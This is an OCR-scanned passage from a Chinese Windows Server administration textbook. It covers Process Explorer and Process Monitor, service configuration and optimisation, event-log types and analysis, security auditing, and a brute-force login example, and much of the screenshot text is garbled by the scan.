行 ,以 下 介绍 Process Monitor 和 Process Explorer 工具 组 合 使 用 来 进行 任务 管理 操作 。 

Process Explorer 和 Process Monitor 都 是 微软 官方 推荐 的 增强 型 任务 管理 器 软件 。 

Process Explorer 比 Windows 自 带 的 任务 管理 器 强大 的 多 ,能 让 用 户 通过 使 用 该 软件 
发 现 许 多 用 Windows 自 带 的 任务 管理 器 看 不 到 的 程序 运行 信息 ,包括 在 后 台 执 行 的 处 理 程 
序 , 非 常 详细 地 以 树 状 目录 的 方式 清晰 明了 地 显示 进程 之 间 的 归属 关系 ,通过 简单 的 操作 还 
可 以 看 到 每 个 程序 更 为 详细 的 信息 。 让 人 清楚 地 了 解 系统 已 经 载 人 哪些 模块 ,该 程序 所 调 
用 的 DLL, 打开 的 句柄 。Process Explorer 最 大 的 特色 在 于 可 以 强制 监视 . 挂 起 .重启 和 强行 
终止 任何 进程 ,其 中 也 包括 系统 的 核心 进程 。 

Process Monitor 是 一 个 在 Windows 平台 上 使 用 的 高 级 监视 工具 ,可 以 实时 显示 文件 系统 、 
注册 表 和 进程 /线程 活动 。 它 融合 了 Sysinternals 公司 开发 的 两 个 实用 工具 Filemon 和 Regmon 
的 功能 ,并 且 增加 了 大 量 增强 的 功能 ,其 中 包括 丰富 且 不 具 破 坏 性 的 筛选 功能 .全面 的 事件 属 
性 ,例如 会 话 ID 和 用 户 名 、 可 靠 的 进程 信息 、 完 整 的 线程 堆栈 、 同 一 文件 并 行 日 志 记 录 等 功能 。 
可 以 说 Process Monitor 是 Filemon 和 Regmon 的 结合 . 优 于 Filemon 和 Regmon 的 组 合 。 

具体 操作 步骤 如 下 。 

(1) 下 载 . 解 压 软件 ,运行 Process Explorer, 可 以 通过 * 选 项 ”一 “字体 ”的 设置 ,修改 字 
体 大 小 ,调整 到 系统 合适 的 状态 。 其 运行 界面 如 图 5-7 所 示 。 
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图 5-7 Process Explorer 运行 界面 


从 图 5-7 中 可 以 看 出 系统 当前 正在 运行 的 进程 名 称 ,PID、CPU 占用 率 、 私 有 字 节 (内 存 
占用 字 节 ) 等 信息 。 这 些 在 Windows 任务 管理 器 中 通过 设置 相应 的 选项 也 可 以 得 到 。 

(2) Process Explorer 增强 功能 的 使 用 。 

Q@ 进程 名 称 的 时 候 是 树 状 目录 显示 ,这样 便于 查看 每 个 进程 之 间 的 所 属 关 系 。 

@ 丰富 的 右键 扩展 功能 ,可 以 进行 进程 信息 的 扩展 查看 .设置 进程 的 优先 级 .调试 、 挂 
起 等 ,如 图 5-8 所 示 。 








工作 组 指 述 
2,920 Windows 登录 应 月 


图 5-8 Process Explorer 增强 型 功能 
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@ 强制 终止 程序 的 能 力 和 Windows 自 带 的 任务 管理 器 比较 起 来 ,其 执行 能 力 要 强大 许 
多 。 其 至 可 以 终止 Winlogon 等 最 核心 的 进程 。 

@ 右 击 程序 ,在 弹出 的 快捷 菜单 中 ,选择 “属性 ?命令 可 以 查看 非常 详细 的 进程 信息 ,如 
图 5-9 所 示 。 
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图 5-9 Process Explorer 显示 进程 信息 


(3) 下 载 . 解 压 软件 并 运行 Process Monitor, 其 运行 界面 如 图 5-10 所 示 。 





详细 
长 度 ; 0，size:.， 


功 。 所 多 访问 : 读 属 . ， 
创建 时 间 : 2011/. 
所 雪 访 问 :通用 
。 偏 移 ; 0， 
总 \Users\Snaker\AppData\Roaning \Tencent \QQPiny. .. 

CU\Software\Classes 所 需 访 问 : 最 大 
RCINSOEYESNC 查询 : 
EWCU\Softvare\Classes\CLSID\ {660B90C3-73A9-4B5. . . 名 称 ... 

HECR\CLSID\ {660B90C8-7349-4B58-8CAE- 355B7F55341B} Ee 
HKCU\Software\Classes 成 功 
HKCR\CLSID\ {660b90c8-73a9-4b58-8cae-355b7f55341b} 成 功 
HkCU\Sof tware\Classes\CLSID\ {660b90c8-73a9-4b5. . 名称. . 
ECR\CLSID\ {660b90c8-73a9-4b58-8cae-355b7f5534. .. 名 称 ... 所 震 : 
Meh bi THO-AiGh: Goes SRAM [3] 的 



































5-10 ”Process Monitor 运行 界面 
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(4) 该 软件 默认 是 显示 监视 系统 中 所 有 的 进程 对 文件 、 注 册 表 、 网 络 连 接 、 线 程 活动 的 
情况 。 通 常 需 要 对 监控 结果 进行 过 滤 。 在 过 滤 选 项 中 ,选择 过滤? 选项 ,如 图 5-11 所 示 。 
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图 5-11 Process Monitor 过 滤 进 程 界面 


(5) 选择 需要 的 进程 的 PID 进行 添加 ,下 面 是 规则 的 设置 ,参考 图 5-11, 有 针对 地 选择 
一 个 PID 之 后 ,再 在 主 界面 中 进行 更 细 的 过 滤 。 图 5-12 以 360 极速 浏览 器 为 例 。 输 入 : 
5284 这 个 PID 值 , 单 击 “ 确 定 ” 按 钮 ,如 图 5-12 所 示 。 


文件 月 ” 姑 浊 ”事件 V] 过 于 (工具 和 运 项 (O) 吉 押 (H) 
[Ba | ABE| SAGI TO 5 
a] 进程 名 称 PID 路 径 第 一 个 是 注册 表 结果 

+128: SS 最 TenoetVPiry . 人 
Tenei 功 ”所 稚 访 问 : 谍 属 .， 

创建 时 间 : 2011/. 


所 短 访 问 : 通用 . . 
偏 移 ，0， 长 度 : 








TR rs 
D:VProgran es ee 四 


偏 移 :. 

篇 移 : 1, 073, 74. 
分配 大 小 : 20, 48. 
篇 移 : 24， 长 度 : 











5-12 ”Process Monitor 过 滤 示 例 


(6) 可 以 看 到 全 部 关于 “360” 的 信息 ,然后 ,以 查看 “其 对 文件 的 访问 "为 例 ,取消 选中 
图 5-12 红 框 中 第 一 、 第 三 、 第 四 个 单 选 按钮 。 结 果 如 图 5-13 所 示 。 

从 图 5-13 就 可 以 看 出 仅 有 360 极速 浏览 器 访问 文件 的 信息 了 ,更 详细 的 结果 还 可 以 通 
过 右键 进行 排除 相关 项 目 内 容 。 如 查看 其 是 否 扫描 了 用 户 文件 , 便 可 以 将 其 访问 自身 文件 
排除 掉 。 
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当天 时 间 进程 名 称 。 PID 操作 路 径 结果 ”详细 
EE 和 \Users\Snaker\AppData\Roaning\Tencent \QQPiny. ., 不 允 - 








,创建 文 : \Users\Snaker\AppData\Roaning\Tencent\QQPiny, .. 成 功 ”所 项 访问 : 谍 属 . 。 
ee \Users\Snaker\AppData\Roaning\Tencent \QQPiny. ., 成 功 。 创建 时 间 : 2011/. 
C: \Users\Snaker \AppData\Roaning\Tencent \QQPiny. .. 成 功 
人 C: \Users\Snaker \AppData\Roaning \Tencent \QQPiny, ,, 成功 ee a 
十 证 文件 D:\Program es 360 李 上 基 \360ChronevChrone，… 所 轨 。 拖 上 : 下 ， 便 区: 
z 提 间 个 文件 D:\Progran Files\360 极 带 浏 览 着 \360Chrone\Chrone. 成 功 [A 
D: \pro i es 
es Files\360 极 过 浏览 器 \360Chrone\Chrone. . .成 功 Rs 20, 48. 
> D:\Program Files\360 根 速 浏 览 器 \360Chrone\Chrone. 成 功 。 仿 移 : 芋 3 7 ] 


Da\VProgran Files\360 要 加 浏览 各 360Chrone\Chrone' 成 功 独占: 想 ， 信 移 : 
D:\Programn Files\360 极 章 浏览 器 \360Chrone\Chrone. .。 篇 移 : be 0 光 
D: Rn 要 头 浏览 泣 nc Ct 

















5 Sn 5284 打开 an File 有 。 a.。 从 黎 
显示 10,259 个 , 共 676,323 个 事件 (1.5%) 使 用 页 面 文件 备份 


图 5-13 ”Process Monitor 按 对 文件 访问 过 滤 
> 5.2.2 系统 服务 


由 1. 什么 是 系统 服务 


在 Windows Server 系统 中 ,系统 服务 (System Services) 是 指 执行 指定 系统 功能 的 程 
序 、 例 程 或 进程 ,以 便 支持 其 他 程序 .尤其 是 底层 (接近 硬件 ) 程 序 。 通 过 网 络 提供 服务 时 , 服 
务 可 以 在 Active Directory( 活 动 目录 ) 中 发 布 ,从 而 促进 了 以 服务 为 中 心 的 管理 和 使 用 。 

系统 服务 是 一 种 应 用 程序 类 型 ,在 后 台 和 运行。 服务 应 用 程序 通常 可 以 在 本 地 或 通过 网 
络 为 用 户 提供 一 些 功能 ,例如 客户 端 / 服 务 器 应 用 程序 .Web 服务 器 ,数据库 服 务 器 以 及 其 他 
基于 服务 器 的 应 用 程序 。 与 用 户 运行 的 程序 相 比 , 服 务 不 会 出 现 程 序 窗口 或 对 话 框 , 只 有 在 
任务 管理 器 中 才能 观察 到 。 

系统 服务 在 Windows Server 系统 中 ,服务 是 指 执行 指定 系统 功能 的 程序 、 例 程 或 进程 ， 
以 便 支 持 其 他 程序 ,尤其 是 低层 (接近 硬件 ) 程 序 。 


上 2. 配置 和 管理 系统 服务 


对 系统 服务 的 操作 可 以 通过 “服务 管理 控制 台 ” 来 实现 。 在 Windows Server 系统 中 以 
管理 员 或 Administrators 组 成 员 的 身份 登录 ,选择 “开始 ”一 “运行 "命令 并 单 击 “Services. 
msc” ,打开 服 务 控制 台 。 也 可 以 通过 选择 “开始 ”>“ 控 制 面板 ”>“ 性 能 和 维护 ”>“ 管 理工 
具 ” 一 “服务 ?命令 或 选择 “开始 ”一 “管理 工具 一“ 服务 器 管理 器 ?一 “配置 ”一 “服务 ”命令 来 
启动 控制 台 。 

在 服务 控制 台中 ,双击 任意 一 个 服务 ,就 可 以 打开 该 服务 的 属性 对 话 框 ,如 图 5-14 所 
示 。 可 以 对 服务 进行 配置 管理 操作 ,通过 更 改 服务 的 启动 类 型 来 设置 满足 自己 需要 的 启 
动 、 关 闭 或 禁用 服务 。 


一 一作 
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ME | 
服务 名 称 : Spooler 

有 中 | 显示 名 称 了 rint Spooler 
撤 示 和 本 相川 
司 执行 文件 的 路 径 | 


C:\Windows\Systen32\spoolsv. exe 








[5 | 区 由 二 [| 次 仿 fF) |] [ 恢 夏 &) ] 



































当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 | 

| 启 二 多数 0) [ | 
| 

| 

CE CE | 


图 5-14 系统 服务 的 启动 类 型 


在 “常规 ?选项 卡 中 ,服务 名 称 ? 是 指 服务 的 简称 ,并 且 也 是 在 注册 表 中 显示 的 名 称 ; 
“显示 名 称 ” 是 指 在 服务 配置 界面 中 每 项 服务 显示 的 名 称 ;“ 描 述 ” 是 为 该 服务 做 的 简单 解 
释 ;“ 可 执行 文件 的 路 径 ”" 即 是 该 服务 对 应 的 可 执行 文件 的 具体 位 置 ;“ 启 动 类 型 "是 整个 服 
务 配置 的 核心 ,对 于 任意 一 个 服务 ,通常 都 有 3 种 启动 类 型 , 即 自动 .手动 和 已 禁用 。 只 要 从 
下 拉 列 表 中 选择 就 可 以 更 改 服务 的 启动 类 型 。“ 服 务 状态 "是 指 服务 的 现在 状态 是 启动 还 是 
停止 ,通常 ,可 以 利用 下 面 的 “启动 “停止 “暂停 “恢复 ”按钮 来 改变 服务 的 状态 。 

不 同类 型 的 启动 状态 如 下 。 

(1) 自动 : 此 服务 随 着 系统 启动 时 启动 , 它 将 延长 启动 所 需要 的 时 间 , 有 些 服务 是 必须 
设置 为 自动 的 ,如 Remote Procedure Call(RPC)。 由 于 依存 关系 或 其 他 影响 ,其 他 的 一 些 服 
务 也 必须 设置 为 自动 ,这 样 的 服务 最 好 不 要 去 更 改 它 ,否则 系统 无 法 正常 运行 。 

(2) 手动 : 如 果 一 个 服务 被 设置 为 手动 ,那么 可 以 在 需要 时 再 运行 它 。 这 样 可 以 节省 大 
量 的 系统 资源 ,加 快 系统 启动 。 

(3) 已 禁用 : 此 类 服务 不 能 再 运行 。 这 个 设置 一 般 在 提高 系统 安全 性 时 使 用 。 如 果 怀 
疑 一 个 陌生 的 服务 会 给 系统 带 来 安全 上 的 隐患 ,可 以 先 尝试 停止 它 , 看 看 系统 是 否 能 正常 运 
行 ,如 果 一 切 正常 ,那么 就 可 以 直接 禁用 它 了 。 如 果 以 后 需要 这 个 服务 ,在 启动 它 之 前 ,必须 
先 将 启动 类 型 设置 为 自动 或 手动 。 

单 击 “ 依 存 关 系 ” 选 项 卡 ,可 以 看 到 ,在 顶端 列表 中 指出 运行 选 定 服务 所 需 的 其 他 服务 ， 
底 端 列表 指出 了 需要 运行 选 定 服务 才能 正确 运行 的 服务 。 它 说 明了 一 些 服 务 并 不 能 单独 运 
行 , 必 须 依靠 其 他 服务 。 在 停止 或 禁用 一 个 服务 之 前 ,一 定 要 看 看 这 个 服务 的 依存 关系 ,如 
果 有 其 他 需要 启动 的 服务 是 依靠 这 个 服务 ,就 不 能 将 其 停止 。 在 停止 或 禁用 一 个 服务 前 , 清 
楚 了 解 该 服务 的 依存 关系 是 必 不 可 少 的 步骤 。 
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1a. 紧急 恢复 


如 果 启 用 或 禁用 服务 后 ,启动 计算 机 时 遇 到 问题 ,可 以 在 安全 模式 下 启动 计算 机 ,然后 
可 以 更 改 服务 配置 或 者 恢复 默认 设置 。 紧 急 恢 复出 现在 禁用 了 一 项 系统 必需 服务 后 ,不 能 
稳定 工作 ,也 不 能 在 安全 模式 下 再 次 通过 管理 工具 来 启动 服务 的 情况 。 这 时 需要 对 注册 表 
进行 修改 ,使 系统 恢复 工作 。 

在 注册 表 编 辑 器 中 ,找到 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ 
services” 主 键 ,再 选择 具体 的 服务 名 称 ,可 以 看 到 右边 有 一 个 Start 字符 串 , 其 值 ( 双 字 节 ) 
就 表示 了 服务 的 启动 类 型 : 4 表示 已 禁用 ; 3 表示 手动 ; 2 表示 自动 。 如 图 5-15 所 示 ， 
MSSQLSERVER 服务 是 启动 状态 。 

































































| 中 国 MSSCNTRS 名 称 数 径 

| )- 及 mssmbios i) REG_SZ 仇 值 未 设置 ) 
和 加 Description 。 REGSZ 提供 才 经 的 存储 、 处 | 

| “号 MSSQLSERVER| IDisplayName 。 REG_SZ SQL Server (MSSQ 

| [a Me erwin 镁 Errorcontrol 。 REG_DWORD 0x00000001 (1) 

| ees simagepath = REG_EXPAND_SZ ‘CAprogram Files\| 

| | STEE 2dObjectName REGSZ LocalSystem 

| L ese 一 SeviceSidType REG_DWORD 0x00000001 (1) 

| BB Wals 说 star REG_DWORD 0x00000002 (2) 

| Db it 区 Type REG_DWORD 0x00000010 (16) 
[二 aaa ME "| ; 














计算 机 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MSSQLSERVER 村 


























图 5-15 注册 表 编 辑 中 服务 的 启动 状态 


14. 优化 服务 


采用 NT 为 核心 的 Windows Server 操作 系统 默认 开启 了 许多 系统 服务 ,有 些 服 务 并 不 
是 必需 的 , 却 占用 了 一 部 分 内 存 资 源 , 对 于 内 存 资源 紧张 的 用 户 来 说 这 是 不 可 容忍 的 。 并 且 
有 一 些 服务 的 开启 还 会 对 计算 机 安全 构成 了 威胁 。 可 以 使 用 “系统 服务 终结 者 360 安全 
卫士 ?等 进行 服务 优化 配置 。 也 可 以 备份 了 注册 表 后 , 自 定 义 配置 。 

(1) 服务 名 称 Remote Registry: 本 服务 允许 远程 用 户 修改 本 机 注册 表 ,建议 关闭 。 

(2) 服务 名 称 IP Helper: 如 果 网 络 协议 不 是 IPv6 ,建议 关闭 此 服务 。 

(3) 服务 名 称 IPSec Policy Agent: 使 用 和 管理 IP 安全 策略 ,建议 普通 用 户 关闭 。 

(4) 服务 名 称 System Event Notification Service: 记录 系统 事件 ,建议 普通 用 户 关闭 。 

(5) 服务 名 称 Print Spooler: 如 果 不 使 用 打印 机 ,建议 关闭 此 服务 。 

(6) 服务 名 称 Windows Image Acquisition(WIA): 如 果 不 使 用 扫描 仪 和 数码 相机 , 建 
议 关 闭 此 服务 。 

(7) 服务 名 称 Windows Error Reporting Service: 当 系 统 发 生 错 误 时 提交 错误 报告 给 微 
软 , 建 议 关 闭 此 服务 。 
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对 于 大 多 数 初级 用 户 ,建议 先 采 用 默认 配置 ,了 解 各 项 服务 的 意义 后 再 逐步 手动 配置 ， 
并 在 资源 占用 和 功能 上 取得 比较 完美 的 均衡 。 


j> 5.2.3 系统 日 志 


Windows Server 自 带 了 相当 强大 的 的 安全 日 志 系 统 , 从 用 户 登 录 到 特权 的 使 用 ,都 有 
非常 详细 的 记录 。 通 过 选择 “开始 ”一 “管理 工具 ”一 “事件 查看 器 ”命令 可 以 看 到 日 志文 件 ， 
如 图 5-16 所 示 。 




















再 
2017-03-12 7:03;22 

2017-03-12 7:03:22 

了 2017-03-12 5:58;22 

得 系统 2017-03-12 5:58:22 

由 转发 事件 2017-03-12 6:58:22 

田 哆 应 用 程序 和 服务 日 志 2017-03-12 6:58:21 
局 订阅 2017-03-12 0:00:23 





2017-03-12 0:00:00 
2017-03-11 4:50:23 
2017-03-11 4:50:23 
2017-03-11 4:45:15 国 将 所 有 事件 另存 为 


2017-03-11 4:45-13 
志 . 
2017-03-11 4:45:13 将 任务 附加 到 此 日 志 





bE 
| 
le Software Protection service has stopped. 


日 志 名 称 (M): 应 用 程序 | 









转 将 任务 附加 到 此 事件 

皮 到 » 

同 保存 选择 的 事件 一 
i l 





Re == = 








图 5-16 ”Windows Server 2008 事件 查看 器 


1. 日 志 记 录 的 分 类 


Windows 操作 系统 中 优先 级 最 高 的 记录 机 制 是 事件 查看 器 ,其 允许 系统 记录 不 同类 型 
的 系统 事件 。 所 有 的 Windows 系统 都 有 3 种 基本 的 日 志文 件 ,包括 安全 日 志 、 应 用 日 志 、 系 
统 日 志 。 

(1) 安全 日 志 。 该 日 志 包括 发 生 在 系统 中 与 安全 相关 的 事件 ,具体 需要 记录 的 内 容 由 
系统 管理 员 控 制 。 几 个 典型 的 安全 日 志 记录 包括 尝试 登录 失败 、 举 试 越权 及 类 似 的 系统 
事件 。 

系统 安全 日 志 就 是 每 次 开关 机 、 运 行程 序 、 系 统 报错 时 ,这 些 信 息 都 会 被 记录 下 来 ,保存 
在 日 志文 件 中 。 而 日 志文 件 会 随 着 时 间 的 增长 而 越 积 越 多 ,从 而 影响 系统 速度 。 如 果 看 到 
“安全 日 志 ” 中 的 内 容 是 空 的 ,是 因为 用 户 没有 设置 相应 的 “安全 审核 "策略 。 
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以 管理 员 身份 登录 (Administrator) 后 选择 “开始 ”一 “设置 >“ 控制 面板 ”一 “管理 工具 ” 
命令 ,双击 “事件 查看 器 ”项 ,可 以 看 到 应 用 程序 日 志 、 安 全 日 志 、 系 统 日 志 。 在 任意 一 种 日 志 
上 右 击 , 在 弹出 的 快捷 菜单 中 ,选择 “清除 所 有 事件 ”命令 即 可 。 也 可 以 右 击 ,在 弹出 的 快捷 
菜单 中 选择 “属性 命令 ,为 日 志 设 定 大 小 的 上 限 ,并且 选择 当日 志 满 了 以 后 的 处 理 方式 ,一 
0 段 时 间 的 旧 日 志 , 这 样 日 志 就 永远 不 会 超出 指定 大 小 。 

(2) 应 用 日 志 。 该 日 志 记 录 的 是 系统 中 启动 应 用 程序 的 事件 ,由 每 个 软件 包 决 定 该 日 

志 的 内 容 。 eae pep 该 日 志 同 样 记录 与 某 些 应 用 程序 相关 的 核心 安全 信 
息 . 例如 ,应 用 日 te eg ene ete 

(3) 系统 日 志 。 志 记 录 的 是 与 操作 系统 有 关 的 事件 ,如 软 硬 件 故 障 和 其 他 的 系统 
问题 ， Eee 

除了 以 上 3 种 日 志 类 型 外 ,还 有 以 下 几 种 日 志 记录 。 

(1) 目录 服务 日 志 。 该 日 志 存 储 在 Windows 域 控 制 器 中 ,主要 内 容 是 与 Windows 目录 
服务 有 关 的 事件 记录 。 

(2) 错误 日 志 。 该 日 志 记录 的 事件 为 系统 内 发 生 重大 故障 的 事件 。 

(3) 警告 日 志 。 该 日 志向 系统 管理 员 报 告 系统 内 存在 的 潜在 安全 问题 。 例 如 , 当 一 个 
硬盘 存放 的 数据 达到 其 承受 的 最 大 值 时 ,会 及 时 触发 安全 警报 。 

(4) 信息 日 志 。 记 录 内 容 由 系统 管理 员 设 定 ,一 般 是 系统 运行 情况 ,但 并 不 会 反映 系统 
安全 隐患 的 内 容 。 例 如 ,信息 日 志 中 可 能 记录 系统 正常 启动 或 正常 停止 某 一 进程 这 一 事件 。 


12. 日 志 数 据 分 析 

1) 建立 正常 行为 基准 

分 析 日 志文 件 的 第 一 步 就 是 先 了 解 哪 些 行为 属于 正常 行为 ,这 些 正常 行为 也 可 以 称 为 
行为 基准 。 这 些 行 为 基准 就 是 不 同 的 系统 在 不 同 环境 中 ,不 同时 间 段 中 的 正常 系统 资源 消 
耗 ,将 用 于 日 后 的 异常 行为 监测 。 

系统 管理 员 要 为 系统 确定 合适 的 基准 来 监测 系统 的 故障 。 

2) 监测 异常 行为 

建立 系统 基准 之 后 ,下 一 步 就 是 监测 异常 行为 ,需要 考虑 以 下 几 方 面 因 素 。 

(1) 行为 偏离 系统 基准 的 程度 。 确 定 系统 基准 行为 的 阔 值 ,不 同系 统 的 相应 阔 值 是 不 
同 的 。 例 如 ,统计 两 个 系统 的 行为 参数 ,两 个 系统 的 CPU 利用 率 的 平均 值 为 45%% ,其 中 一 个 
系统 的 CPU 利用 率 浮动 在 10%% 一 60%; 另 一 个 在 5%~~90%。 可 以 通过 以 上 数据 确定 第 一 
个 系统 的 CPU 利用 率 的 阔 值 为 65% ; 另 一 个 为 95%。 

(2) 偏差 行为 发 生 的 时 间 。 某 些 正常 情况 下 ,系统 的 行为 也 有 可 能 超出 基准 的 阅 值 范 
围 。 确 定 行为 是 否 为 异常 事件 还 要 取决 于 行为 持续 的 时 间 。 根 据 不 同 的 系统 及 不 同 的 安全 
需求 ,时 间 标 准 是 不 同 的 。 上 面 的 例子 中 .对 于 第 一 个 系统 ,如果 系统 CPU 利用 率 越过 65% 
的 情况 持续 两 分 钟 以 上 , 则 被 认定 为 异常 事件 ,而 另 一 个 越过 阔 值 持续 半分 钟 就 认定 为 异常 
事件 。 

(3) 需要 报告 的 异常 事件 类 型 。 每 个 系统 都 存在 着 一 些 更 能 说 明 系 统 正在 遭受 安全 威 
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胁 的 事件 ,这 类 事件 就 应 立刻 向 系统 管理 员 报告 。 


如 果 硬 盘 中 存放 着 企业 信息 的 数据 库 , 其 数据 利用 率 的 基准 为 40% ,而 某 时 间 段 其 利用 
率 突然 上 升 为 99%, 则 说 明 系 统 中 可 能 正在 发 生 着 针对 数据 库 的 入 侵 , 该 事件 就 应 该 立刻 报 
告 给 管理 员 。 相 反 , 有 些 严 重 程序 相对 较 弱 的 事件 就 可 以 简单 记录 , 供 日 后 进行 审阅 。 

3) 简化 数据 

日 志 记 录 的 一 个 常见 错误 就 是 为 了 避免 错过 任何 细节 而 存储 大 量 数据 。 因 此 ,日 志 

录 的 一 个 基本 原则 是 尽 可 能 缩小 日 志 记录 的 范围 从 而 缩减 日 志 ep 
的 时 间 。 但 事实 上 ,在 很 多 环境 中 是 很 难 做 到 这 一 点 的 。 作 为 安全 分 析 员 ,要 利用 一 ed 
缩减 工具 来 缩小 日 志 记 录 范 围 。 如 CheckPoint 的 Firewall-1 的 渗透 保护 程序 就 带 有 日 志 
录 功 能 ,并 提供 了 一 种 过 滤 技 术 ,人 允许 快速 缩减 日 志 数据 。 


有 3. 系统 日 志 安全 维护 


系统 日 常 维护 对 系统 安全 也 很 重要 。 如 果 一 个 人 侵 者 可 以 获得 管理 员 权 限 ,就 可 以 进 
和 系统 删除 相关 的 安全 日 志 , 进 而 消除 其 进入 系统 的 痕迹 或 证 据 。 因 此 ,对 系统 日 志 的 安全 
管理 也 必须 高 度 重视 。 避 免 人 侵 者 修改 系统 日 志 的 方式 主要 有 以 下 几 种 。 

(1) 远程 记录 。 建 立 一 个 核心 数据 库 , 用 于 存储 网 络 中 所 有 系统 的 安全 日 志 , 该 数据 库 
的 安全 性 必须 足够 高 .能够 防止 入 侵 者 随意 修改 日 志 记录 。 因 此 ,数据 库 的 数据 都 应 该 是 只 
读 的 ,其 他 系统 只 能 写 入 数据 而 无 法 删除 数据 。 

(2) 记录 实时 输出 。 该 机 制 一 般 用 于 较 高 安全 性 环境 ,打印 机 可 以 实时 输出 日 志 内 容 ， 
便于 日 后 调查 。 

(3) 机 密 技 术 。 该 技术 通常 用 于 对 日 志文 件 的 认证 ,在 一 个 日 志文 件 完成 记录 后 ,系统 
会 对 其 进行 数字 签名 。 管 理 员 想 要 审阅 日 志文 件 时 ,首先 需要 对 数字 签名 进行 认证 。 


有 4 系统 安全 审计 


安全 审计 是 安全 专家 必须 承担 的 一 份 责任 。 进 行 审核 时 ,安全 专家 分 析 各 个 系统 、 应 用 
程序 和 整个 网 络 的 安全 态势 ,找到 其 中 的 缺陷 ,然后 制订 一 个 行动 计划 解决 该 缺陷 。 

1) 审计 小 组 

实施 一 次 成 功 的 安全 审计 ,最 为 重要 的 因素 就 是 有 一 个 受过 良好 训练 并 积极 工作 的 审 
计 小 组 。 符 合 信息 安全 审计 的 要 求 。 

2) 审计 工具 

(1) 检验 表 。 检 验 表 提供 了 一 种 简单 的 途径 将 组 织 中 重复 的 工作 标准 化 。 包 括 漏洞 检 
验 表 , 检 验 包括 一 个 关键 漏洞 列表 ,这 些 漏洞 都 需要 审计 者 在 执行 安全 审计 时 进行 检查 等 。 

(2) IP 和 端口 扫描 。 

(3) 漏洞 扫描 。 漏 洞 扫描 器 分 析 系 统 中 常见 的 漏洞 ,并 将 其 汇总 起 来 形成 详细 的 报告 ， 
同时 给 出 相应 的 补救 方法 。 

(4) 完整 性 检验 。 

(5) 渗透 测试 。 用 系统 化 的 方式 对 系统 安全 防御 进行 渗透 ,从 而 检测 系统 当前 的 安全 
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3) 审计 结果 处 理 

审计 完成 后 ,整个 工作 还 没有 结束 ,应 该 重新 审阅 整个 网 络 系统 所 使 用 的 安全 技术 带 来 
的 结果 。 事 后 审计 的 工作 计划 的 主要 步骤 如 下 。 

(1) 给 出 审计 结果 的 报告 ,包括 检测 出 的 系统 存在 的 缺陷 及 相关 的 详细 资料 。 

(2) 对 系统 面临 的 危险 按 优先 级 进行 排列 。 

(3) 为 每 个 威胁 提出 修补 意见 与 方案 。 

(4) 按照 优先 级 处 理 这 些 威胁 。 

(5) 对 修补 过 程 进行 持续 性 的 监控 ,并 吸取 相关 的 经 验 与 教训 。 

(6) 对 系统 进行 周期 性 的 审计 ,识别 系统 新 出 现 的 安全 威胁 。 


和 5. 日 志 问题 示例 
如 某 台 服务 器 ,安装 Windows Server 2008 x86 的 操作 系统 ,安全 日 志 如 图 5-17 所 示 。 


40, 345 个 事件 











关键 字 日 期 和 时 间 来 
核 失败 。 2014/1174 9:27:24 Mierosoft 
七 审核 失 贮 。 2014/11/4 9:27:19 Microsoft, 




















" 2014/11/4 9:27:08 Mierosoft... 
蜗 审 核 失 败 。 2014/11/4 9:27:00 Microsoft. 4625 登录 
审核 失败 。 2014/11/4 9:26;50 Microsoft, 4625 登录 


审核 失败 。 2014/11/4 9:26:50 Microsoft... 4625 登录 
次 审核 内 败 。 2014/11/4 9:26:37 和 4625 登录 
太 审 校 失 败 。 2014/11/4 9:26:27 Mierosoft 4625 登录 
审核 失败 。 2014/11/4 9:26:16 Microsoft. 4625 登录 
审核 失败 2014/11/4 9:26:12 Microsoft, 4625 登录 
硕 审 核 失败 。 2014/11/4 9:26:06 Microsoft. 4625 登录 
大 审核 失败 。 2014/11/4 9:25:59 Microsoft. 4625 登录 
咏 审 核 内 败 。 2014/11/4 9:25:58 Wierosoft... 4625 登录 


审核 失败 。 2014/11/4 9:25:52 Microsoft, 4625 登录 
审核 失败 。 2014/11/4 9:25:44 Mierosoft, 4625 登录 


各市 核 内 败 。 2014/11/4 9:25:42 Wierosoft... 4625 登录 
9 2014/11/4 9:25:37 Microsoft, 4625 登录 
2014/11/4 9:25:30 Microsoft. 4625 登录 





图 5-17 Windows Server 2008 安全 日 志 


在 图 5-17 中 ,审核 失败 ,事件 ID 为 4625 的 记录 每 分 钟 大 概 会 出 现 8 次 。 查 看 该 事件 的 
详细 日 志 , 可 知 该 事件 是 登录 请 求 失败 时 生成 的 ,还 可 以 查 出 请 求 登录 的 账户 登录 类 型 为 3 
(最 常见 的 类 型 是 2( 交 互 式 ) 和 3( 网 络 ))、 网 络 信 息 ( 源 IP 及 端口 等 )、 详 细 身 份 验证 等 
信息 。 

一 般 判 断 为 可 能 存在 不 断 的 尝试 性 登录 ,试图 在 短 时间 内 不 断 地 以 暴力 破解 登录 账号 
密码 , 攻 入 服务 器 远程 控制 。 解 决 的 办 法 是 “使 用 防火 墙 限制 指定 IP 不 能 访问 ”。 

当然 ,日 志文 件 中 还 有 很 多 信息 。 例 如 ,远程 3389 登录 机 器 成 功 后 会 生成 一 个 事件 ID 
为 4648 的 安全 事件 ,同时 也 会 生成 4624 事件 ; 远程 3389 登录 失败 会 生成 事件 ID 为 4625 
的 安全 事件 等 。 

此 外 ,事件 日 志 管 理 是 服务 器 维护 中 的 一 项 非常 重要 的 日 常 工作 ,当然 也 是 一 项 耗费 精 
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力 、 体 力 的 工作 。 当 局 域 网 中 有 非常 多 的 应 用 服务 器 时 更 是 如 此 。 在 Windows Server 2008 
中 提供 了 一 项 新 功能 “订阅 ”, 如 图 5-16 所 示 ,通过 该 功能 ,可 以 实现 服务 器 事件 日 志 的 转发 
和 订阅 ,完成 “ 自 定义 将 特定 的 服务 器 事件 日 志 ” 的 集中 管理 。 


ENE 


P 5.3.1 注册 表 的 基础 知识 


注册 表 (Registry) 是 Microsoft Windows 中 的 一 个 重要 的 数据 库 , 用 于 存储 系统 和 应 用 
程序 的 设置 信息 。 打 开 注 册 表 的 命令 是 regedit、regedt32。 如 果 上 述 打开 注册 表 的 方法 不 
能 使 用 ,说 明 用 户 没 有 管理 员 权限 ,或 者 注册 表 被 锁定 。 

注册 表 是 Windows 操作 系统 中 的 一 个 核心 数据 库 , 其 中 存放 着 各 种 参数 ,直接 控制 着 
Windows 的 启动 .硬件 驱动 程序 的 装载 以 及 一 些 Windows 应 用 程序 的 运行 ,从 而 在 整个 系 
